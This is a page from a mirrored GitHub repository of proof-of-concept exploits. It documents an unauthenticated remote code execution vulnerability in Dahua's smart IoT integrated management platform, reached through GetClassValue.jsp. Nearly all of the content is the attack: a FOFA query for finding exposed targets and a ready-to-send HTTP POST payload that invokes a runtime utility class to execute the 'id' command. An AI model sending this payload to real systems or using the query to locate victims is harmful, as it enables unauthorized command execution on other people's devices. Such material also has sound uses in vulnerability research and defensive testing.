admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/大华/大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞.md
wy876 fd598ac36b 20250104更新
2025-01-04 14:11:18 +08:00

809 B
Raw Blame History

大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞

大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞攻击者可以不需要授权远程执行命令。

fofa

app="dahua-智能物联综合管理平台"

poc

POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host: 
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
    "data": {
        "clazzName": "com.dahua.admin.util.RuntimeUtil",
        "methodName": "syncexecReturnInputStream",
        "fieldName": ["id"]
    }
}

image-20250102172533617